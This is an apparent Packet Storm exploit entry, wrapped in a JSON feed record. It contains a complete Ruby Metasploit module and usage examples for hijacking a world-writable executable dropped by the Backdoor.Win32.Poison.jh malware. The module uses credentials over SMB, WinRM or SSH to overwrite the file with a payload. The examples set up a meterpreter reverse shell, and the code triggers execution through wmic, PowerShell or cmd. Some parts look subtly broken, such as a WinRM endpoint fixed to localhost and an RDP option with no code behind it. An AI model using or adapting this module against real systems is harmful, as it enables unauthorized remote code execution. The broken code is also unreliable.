{“lastseen”:”2025-12-26T17:18:37″,”description”:”This code represents an educational Metasploit module concept that demonstrates how insecure file permissions created Backdoor.Win32.Poison.jh could be abused to achieve code execution. The scenario assumes that the malware drops an executable file…”,”published”:”2025-12-26T00:00:00″,”modified”:”2025-12-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Backdoor.Win32.Poison.jh Remote File Hijack”,”source”:””,”references”:””,”id”:”PACKETSTORM:213313″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Backdoor.Win32.Poison.jh Remote File Hijack Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : System built\u2011in component. No standalone download available |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213264\/ \\u0026 MVID-2025-0704\\n \\n [+] Summary : This code represents an educational Metasploit module concept that demonstrates how insecure file permissions created by malware (Poison.jh) \\n could be abused to achieve code execution.\\n The scenario assumes that the malware drops an executable file inside a protected Windows directory (SysWOW64) \\n \\t\\t\\t\\t with overly permissive access rights (e.g., Everyone: Full Control). If such a misconfiguration exists, \\n \\t\\t\\t\\t an attacker who already has valid access (credentials, SMB, WinRM, or SSH) could theoretically replace the file with a malicious payload. \\n \\t\\t\\t\\t When the file is later executed by the system or malware itself, the attacker\u2019s code would run.\\n \\n [+] Key points:\\n \\n This is not a native Windows vulnerability.\\n \\n It does not work on clean or properly configured systems.\\n \\n It requires existing malware, write permissions, and a trigger for execution.\\n \\n In real-world conditions, Windows system directories are protected and prevent this attack without administrative privileges.\\n \\t\\t\\t\\t \\n [+] Vulnerability Overview :\\n \\n CWE-276: Incorrect Default Permissions\\n \\n Malware: Backdoor.Win32.Poison.jh\\n \\n Location: C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe\\n \\n Flaw: File has Everyone:(ID)F (Full Control) permissions\\n \\n Impact: Any local user can modify\/replace the malware executable\\n \\t\\n Type: Backdoor Trojan (Win32\/Windows)\\n \\n Purpose: Grants attackers unauthorized remote access and control over the infected system.\\n Behavior: Can execute commands, download\/upload files, steal sensitive data, and connect to C2 (Command \\u0026 Control) servers.\\n Discovery: Part of the Backdoor.Win32.Poison family, first identified around 2009. The .jh suffix refers to a specific variant or signature used by antivirus vendors.\\n Source: Developed by malware authors; not self-spreading, usually delivered via malicious downloads, infected executables, or phishing.\\n Relation to Poison Ivy: Not necessarily Poison Ivy itself, but shares similar RAT functionality.\\n Detection \\u0026 Prevention: Detected by major AV solutions like Microsoft Defender, Trend Micro, and Kaspersky. Removal requires standard AV cleanup and disconnecting from networks.\\n Key Points: Unauthorized remote control, file manipulation, data theft, part of Poison family, Windows-targeted, identified in AV databases since ~2009.\\n \\n [+] PoC : \\n \\n [+] Module Usage Guide :\\n \\n Installation:\\n \\n # Copy to Metasploit modules directory ====\\u003e cp poison_jh_remote.rb ~\/.msf4\/modules\/exploits\/windows\/remote\/\\n \\n Usage Examples:\\n \\n 1. Check if target is vulnerable:\\n \\n msf6 \\u003e use exploit\/windows\/remote\/poison_jh_file_hijack\\n msf6 exploit(poison_jh_file_hijack) \\u003e set RHOST 192.168.1.100\\n msf6 exploit(poison_jh_file_hijack) \\u003e set SMBUser administrator\\n msf6 exploit(poison_jh_file_hijack) \\u003e set SMBPass Password123\\n msf6 exploit(poison_jh_file_hijack) \\u003e set CHECK_ONLY true\\n msf6 exploit(poison_jh_file_hijack) \\u003e run\\n \\n 2. Full exploit via SMB:\\n \\n msf6 \\u003e use exploit\/windows\/remote\/poison_jh_file_hijack\\n msf6 exploit(poison_jh_file_hijack) \\u003e set RHOST 192.168.1.100\\n msf6 exploit(poison_jh_file_hijack) \\u003e set SMBUser administrator\\n msf6 exploit(poison_jh_file_hijack) \\u003e set SMBPass Password123\\n msf6 exploit(poison_jh_file_hijack) \\u003e set PROTOCOL SMB\\n msf6 exploit(poison_jh_file_hijack) \\u003e set PAYLOAD windows\/x64\/meterpreter\/reverse_tcp\\n msf6 exploit(poison_jh_file_hijack) \\u003e set LHOST 192.168.1.50\\n msf6 exploit(poison_jh_file_hijack) \\u003e set LPORT 4444\\n msf6 exploit(poison_jh_file_hijack) \\u003e exploit\\n \\n 3. Exploit via WinRM:\\n \\n msf6 exploit(poison_jh_file_hijack) \\u003e set PROTOCOL WinRM\\n msf6 exploit(poison_jh_file_hijack) \\u003e set WINRM_USER admin\\n msf6 exploit(poison_jh_file_hijack) \\u003e set WINRM_PASS Password123\\n msf6 exploit(poison_jh_file_hijack) \\u003e set RPORT 5985\\n msf6 exploit(poison_jh_file_hijack) \\u003e exploit\\n \\n 4. Exploit via SSH:\\n \\n msf6 exploit(poison_jh_file_hijack) \\u003e set PROTOCOL SSH\\n msf6 exploit(poison_jh_file_hijack) \\u003e set SMBUser root # SSH username\\n msf6 exploit(poison_jh_file_hijack) \\u003e set SMBPass password123 # SSH password\\n msf6 exploit(poison_jh_file_hijack) \\u003e set RPORT 22\\n msf6 exploit(poison_jh_file_hijack) \\u003e exploit\\n \\n ##\\n # Module: exploit\/windows\/remote\/poison_jh_file_hijack\\n # Title: Poison.jh Remote File Hijack Exploit\\n # Description: Exploits Poison.jh malware’s insecure file permissions remotely\\n ##\\n \\n require ‘msf\/core’\\n require ‘rex’\\n require ‘net\/ssh’\\n require ‘net\/smtp’\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::SMB::Client\\n include Msf::Exploit::Remote::WinRM\\n include Msf::Exploit::Remote::Tcp\\n include Msf::Exploit::EXE\\n include Msf::Auxiliary::Report\\n \\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘Poison.jh Remote File Permission Hijack’,\\n ‘Description’ =\\u003e %q{\\n This module exploits the insecure file permissions of the Backdoor.Win32.Poison.jh\\n malware to achieve remote code execution. The malware creates a world-writable\\n executable at C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe, allowing remote attackers to\\n replace the file and execute arbitrary code.\\n \\n This module requires network access to the target and valid credentials.\\n },\\n ‘Author’ =\\u003e [\\n ‘indoushka’,\\n ‘Based on Malvuln advisory MVID-2025-0704’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/malvuln.com\/advisory\/3d9821cbe836572410b3c5485a7f76ca.txt’],\\n [‘CWE’, ‘276’],\\n [‘MVID’, ‘MVID-2025-0704’]\\n ],\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘Payload’ =\\u003e {\\n ‘Space’ =\\u003e 2048,\\n ‘DisableNops’ =\\u003e true\\n },\\n ‘Targets’ =\\u003e [\\n [‘Windows (via SMB)’, {}],\\n [‘Windows (via WinRM)’, {}],\\n [‘Windows (via RDP)’, {}]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2025-12-23’\\n ))\\n \\n register_options([\\n OptString.new(‘RHOST’, [true, ‘The target address’]),\\n OptString.new(‘RPORT’, [false, ‘The target port’, 445]),\\n OptString.new(‘SMBUser’, [false, ‘SMB Username’]),\\n OptString.new(‘SMBPass’, [false, ‘SMB Password’]),\\n OptString.new(‘SMBDomain’, [false, ‘SMB Domain’]),\\n OptString.new(‘TARGET_PATH’, [\\n true,\\n ‘Path to vulnerable Poison.jh executable’,\\n ‘C:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\28463\\\\\\\\YJBE.exe’\\n ]),\\n OptEnum.new(‘PROTOCOL’, [\\n true,\\n ‘Protocol to use for exploitation’,\\n ‘SMB’,\\n [‘SMB’, ‘WinRM’, ‘RDP’, ‘SSH’]\\n ]),\\n OptBool.new(‘CHECK_ONLY’, [\\n true,\\n ‘Only check if target is vulnerable’,\\n false\\n ]),\\n OptString.new(‘WINRM_USER’, [false, ‘WinRM username’]),\\n OptString.new(‘WINRM_PASS’, [false, ‘WinRM password’]),\\n OptInt.new(‘CHECK_TIMEOUT’, [true, ‘Timeout for checking vulnerability’, 30])\\n ])\\n end\\n \\n # —————————————————————\\n # Check if target is vulnerable\\n # —————————————————————\\n def check\\n print_status(\\”Checking if #{rhost} is vulnerable to Poison.jh file hijack…\\”)\\n \\n case datastore[‘PROTOCOL’]\\n when ‘SMB’\\n return check_via_smb\\n when ‘WinRM’\\n return check_via_winrm\\n when ‘SSH’\\n return check_via_ssh\\n else\\n return Exploit::CheckCode::Unknown(\\”Unsupported protocol: #{datastore[‘PROTOCOL’]}\\”)\\n end\\n end\\n \\n # —————————————————————\\n # SMB-based vulnerability check\\n # —————————————————————\\n def check_via_smb\\n begin\\n connect_smb\\n \\n # Try to access the vulnerable path\\n target_path = datastore[‘TARGET_PATH’]\\n share, path = split_unc_path(target_path)\\n \\n print_status(\\”Attempting to connect to share: #{share}\\”)\\n \\n begin\\n smb_login\\n \\n # Try to open file for writing\\n file = smb_open(path, ‘rwct’)\\n \\n if file\\n print_good(\\”File is writable via SMB: #{target_path}\\”)\\n file.close\\n disconnect_smb\\n return Exploit::CheckCode::Vulnerable(\\”File is world-writable via SMB\\”)\\n end\\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode =\\u003e e\\n print_status(\\”Cannot write to file: #{e}\\”)\\n end\\n \\n disconnect_smb\\n \\n rescue ::Rex::ConnectionError =\\u003e e\\n print_error(\\”Connection failed: #{e}\\”)\\n return Exploit::CheckCode::Unknown(\\”Connection failed\\”)\\n rescue ::Exception =\\u003e e\\n print_error(\\”Check failed: #{e}\\”)\\n return Exploit::CheckCode::Unknown(\\”Check failed: #{e}\\”)\\n end\\n \\n Exploit::CheckCode::Safe(\\”File not writable via SMB\\”)\\n end\\n \\n # —————————————————————\\n # WinRM-based vulnerability check\\n # —————————————————————\\n def check_via_winrm\\n begin\\n print_status(\\”Checking via WinRM…\\”)\\n \\n # Execute PowerShell command to check file permissions\\n cmd = \\”Get-Acl ‘#{datastore[‘TARGET_PATH’]}’ | Select-Object -ExpandProperty Access | Where-Object {$_.IdentityReference -match ‘Everyone’ -and $_.FileSystemRights -match ‘FullControl’}\\”\\n \\n result = winrm_execute(cmd)\\n \\n if result \\u0026\\u0026 result.include?(‘Everyone’)\\n print_good(\\”File has Everyone:FullControl permissions\\”)\\n return Exploit::CheckCode::Vulnerable(\\”File permissions allow write access\\”)\\n end\\n \\n rescue ::Exception =\\u003e e\\n print_error(\\”WinRM check failed: #{e}\\”)\\n return Exploit::CheckCode::Unknown(\\”WinRM check failed: #{e}\\”)\\n end\\n \\n Exploit::CheckCode::Safe(\\”File not writable via WinRM\\”)\\n end\\n \\n # —————————————————————\\n # SSH-based vulnerability check\\n # —————————————————————\\n def check_via_ssh\\n begin\\n print_status(\\”Checking via SSH…\\”)\\n \\n # Check if file exists and is writable\\n cmd = \\”test -w ‘#{datastore[‘TARGET_PATH’]}’ \\u0026\\u0026 echo ‘WRITABLE’ || echo ‘NOT_WRITABLE’\\”\\n \\n result = ssh_exec(cmd)\\n \\n if result \\u0026\\u0026 result.include?(‘WRITABLE’)\\n print_good(\\”File is writable via SSH\\”)\\n return Exploit::CheckCode::Vulnerable(\\”File is writable via SSH\\”)\\n end\\n \\n rescue ::Exception =\\u003e e\\n print_error(\\”SSH check failed: #{e}\\”)\\n return Exploit::CheckCode::Unknown(\\”SSH check failed: #{e}\\”)\\n end\\n \\n Exploit::CheckCode::Safe(\\”File not writable via SSH\\”)\\n end\\n \\n # —————————————————————\\n # Main exploit function\\n # —————————————————————\\n def exploit\\n print_status(\\”Starting exploit against #{rhost}…\\”)\\n \\n # Check if target is vulnerable\\n case check\\n when Exploit::CheckCode::Vulnerable\\n print_good(\\”Target is vulnerable!\\”)\\n else\\n fail_with(Failure::NotVulnerable, \\”Target is not vulnerable\\”)\\n end\\n \\n # Generate payload\\n print_status(\\”Generating payload…\\”)\\n payload_exe = generate_payload_exe\\n \\n # Upload and replace file based on protocol\\n case datastore[‘PROTOCOL’]\\n when ‘SMB’\\n exploit_via_smb(payload_exe)\\n when ‘WinRM’\\n exploit_via_winrm(payload_exe)\\n when ‘SSH’\\n exploit_via_ssh(payload_exe)\\n when ‘RDP’\\n exploit_via_rdp(payload_exe)\\n end\\n \\n # Trigger execution\\n trigger_payload\\n \\n # Report\\n report_vuln({\\n host: rhost,\\n name: self.name,\\n refs: self.references,\\n info: \\”Poison.jh file hijack exploited\\”\\n })\\n end\\n \\n # —————————————————————\\n # Exploit via SMB\\n # —————————————————————\\n def exploit_via_smb(payload_exe)\\n print_status(\\”Exploiting via SMB…\\”)\\n \\n begin\\n connect_smb\\n smb_login\\n \\n target_path = datastore[‘TARGET_PATH’]\\n share, path = split_unc_path(target_path)\\n \\n # Backup original file\\n backup_path = path + \\”.backup\\”\\n begin\\n smb_rename(path, backup_path)\\n print_status(\\”Backed up original file to: #{backup_path}\\”)\\n rescue\\n print_warning(\\”Could not backup original file\\”)\\n end\\n \\n # Upload payload\\n print_status(\\”Uploading payload to #{target_path}…\\”)\\n file = smb_create(path)\\n file.write(payload_exe)\\n file.close\\n \\n print_good(\\”Payload uploaded successfully!\\”)\\n \\n rescue ::Exception =\\u003e e\\n print_error(\\”SMB exploit failed: #{e}\\”)\\n fail_with(Failure::Unknown, \\”SMB upload failed\\”)\\n ensure\\n disconnect_smb\\n end\\n end\\n \\n # —————————————————————\\n # Exploit via WinRM\\n # —————————————————————\\n def exploit_via_winrm(payload_exe)\\n print_status(\\”Exploiting via WinRM…\\”)\\n \\n # Convert payload to base64 for PowerShell\\n payload_b64 = Rex::Text.encode_base64(payload_exe)\\n \\n # PowerShell script to replace file\\n ps_script = \\u003c\\u003c~PS\\n $TargetPath = ‘#{datastore[‘TARGET_PATH’]}’\\n $BackupPath = $TargetPath + ‘.backup’\\n $PayloadBytes = [System.Convert]::FromBase64String(‘#{payload_b64}’)\\n \\n # Backup original\\n if (Test-Path $TargetPath) {\\n Copy-Item $TargetPath $BackupPath -Force\\n Write-Host \\”Backed up to: $BackupPath\\”\\n }\\n \\n # Write payload\\n [System.IO.File]::WriteAllBytes($TargetPath, $PayloadBytes)\\n Write-Host \\”Payload written to: $TargetPath\\”\\n \\n # Set execution attributes if needed\\n attrib -r $TargetPath\\n PS\\n \\n result = winrm_execute_ps(ps_script)\\n \\n if result \\u0026\\u0026 result.include?(‘Payload written’)\\n print_good(\\”Payload uploaded via WinRM\\”)\\n else\\n fail_with(Failure::Unknown, \\”WinRM upload failed\\”)\\n end\\n end\\n \\n # —————————————————————\\n # Exploit via SSH\\n # —————————————————————\\n def exploit_via_ssh(payload_exe)\\n print_status(\\”Exploiting via SSH…\\”)\\n \\n # Save payload locally first\\n local_path = \\”\/tmp\/payload_#{Rex::Text.rand_text_alpha(8)}.exe\\”\\n File.binwrite(local_path, payload_exe)\\n \\n # SSH commands\\n target_path = datastore[‘TARGET_PATH’]\\n backup_path = target_path + \\”.backup\\”\\n \\n ssh_cmds = [\\n \\”cp #{target_path} #{backup_path} 2\\u003e\/dev\/null || true\\”,\\n \\”echo ‘Backup created: #{backup_path}’\\”,\\n \\”cat \\u003e #{target_path} \\u003c\\u003c ‘EOF’\\”,\\n payload_exe.force_encoding(‘UTF-8’),\\n \\”EOF\\”,\\n \\”chmod +x #{target_path}\\”,\\n \\”echo ‘Payload uploaded to #{target_path}’\\”\\n ]\\n \\n result = ssh_exec(ssh_cmds.join(‘; ‘))\\n \\n if result \\u0026\\u0026 result.include?(‘Payload uploaded’)\\n print_good(\\”Payload uploaded via SSH\\”)\\n else\\n fail_with(Failure::Unknown, \\”SSH upload failed\\”)\\n end\\n \\n # Clean up local file\\n File.delete(local_path) if File.exist?(local_path)\\n end\\n \\n # —————————————————————\\n # Trigger payload execution\\n # —————————————————————\\n def trigger_payload\\n print_status(\\”Attempting to trigger payload execution…\\”)\\n \\n trigger_commands = [\\n # WMI\\n \\”wmic process call create ‘#{datastore[‘TARGET_PATH’]}’\\”,\\n \\n # PowerShell\\n \\”powershell -c Start-Process ‘#{datastore[‘TARGET_PATH’]}’\\”,\\n \\n # CMD\\n \\”cmd \/c start ‘#{datastore[‘TARGET_PATH’]}’\\”,\\n \\n # Direct execution\\n datastore[‘TARGET_PATH’]\\n ]\\n \\n trigger_commands.each do |cmd|\\n begin\\n case datastore[‘PROTOCOL’]\\n when ‘WinRM’\\n result = winrm_execute(cmd)\\n if result\\n print_good(\\”Payload triggered via: #{cmd}\\”)\\n break\\n end\\n when ‘SSH’\\n result = ssh_exec(cmd)\\n if result\\n print_good(\\”Payload triggered via: #{cmd}\\”)\\n break\\n end\\n end\\n rescue\\n next\\n end\\n end\\n \\n print_status(\\”Waiting for payload to execute…\\”)\\n Rex.sleep(10)\\n end\\n \\n # —————————————————————\\n # Helper: Split UNC path to share and path\\n # —————————————————————\\n def split_unc_path(full_path)\\n # Convert C:\\\\path\\\\to\\\\file to \\\\\\\\server\\\\share\\\\path\\\\to\\\\file\\n if full_path =~ \/^([A-Za-z]):\\\\\\\\(.*)$\/\\n drive = $1\\n path = $2\\n share = \\”#{drive}$\\”\\n return share, path\\n end\\n return nil, full_path\\n end\\n \\n # —————————————————————\\n # Helper: Execute WinRM command\\n # —————————————————————\\n def winrm_execute(cmd)\\n return unless datastore[‘WINRM_USER’] \\u0026\\u0026 datastore[‘WINRM_PASS’]\\n \\n begin\\n opts = {\\n host: rhost,\\n port: datastore[‘RPORT’] || 5985,\\n user: datastore[‘WINRM_USER’],\\n pass: datastore[‘WINRM_PASS’],\\n transport: :negotiate,\\n ssl: false,\\n endpoint: ‘http:\/\/localhost:5985\/wsman’\\n }\\n \\n winrm = Net::WinRM::Connection.new(opts)\\n winrm.shell(:powershell) do |shell|\\n output = shell.run(cmd) do |stdout, stderr|\\n return stdout if stdout\\n end\\n end\\n rescue =\\u003e e\\n print_error(\\”WinRM execute failed: #{e}\\”)\\n nil\\n end\\n end\\n \\n # —————————————————————\\n # Helper: Execute PowerShell via WinRM\\n # —————————————————————\\n def winrm_execute_ps(ps_script)\\n winrm_execute(\\”powershell -encodedcommand #{Rex::Text.encode_base64(ps_script)}\\”)\\n end\\n \\n # —————————————————————\\n # Helper: Execute SSH command\\n # —————————————————————\\n def ssh_exec(cmd)\\n return unless datastore[‘SMBUser’] \\u0026\\u0026 datastore[‘SMBPass’]\\n \\n begin\\n ssh = Net::SSH.start(\\n rhost,\\n datastore[‘SMBUser’],\\n password: datastore[‘SMBPass’],\\n port: datastore[‘RPORT’] || 22,\\n timeout: 30\\n )\\n \\n result = \\”\\”\\n ssh.exec!(cmd) do |channel, stream, data|\\n result \\u003c\\u003c data if stream == :stdout\\n end\\n \\n ssh.close\\n result\\n rescue =\\u003e e\\n print_error(\\”SSH execute failed: #{e}\\”)\\n nil\\n end\\n end\\n \\n # —————————————————————\\n # Helper: Connect to SMB\\n # —————————————————————\\n def connect_smb\\n self.simple = ::Rex::Proto::SMB::SimpleClient.new(\\n address, \\n port: datastore[‘RPORT’] || 445,\\n username: datastore[‘SMBUser’],\\n password: datastore[‘SMBPass’],\\n domain: datastore[‘SMBDomain’]\\n )\\n \\n self.simple.connect\\n end\\n \\n def disconnect_smb\\n self.simple.close if self.simple\\n end\\n \\n def smb_login\\n self.simple.login\\n end\\n \\n def smb_open(path, mode)\\n self.simple.open(path, mode)\\n end\\n \\n def smb_create(path)\\n self.simple.create(path)\\n end\\n \\n def smb_rename(old_path, new_path)\\n self.simple.rename(old_path, new_path)\\n end\\n end\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213313″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213313\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-26T17:18:37″,”description”:”This code represents an educational Metasploit module concept that demonstrates how insecure file permissions created Backdoor.Win32.Poison.jh could be abused to achieve code execution. The scenario…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-32938","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n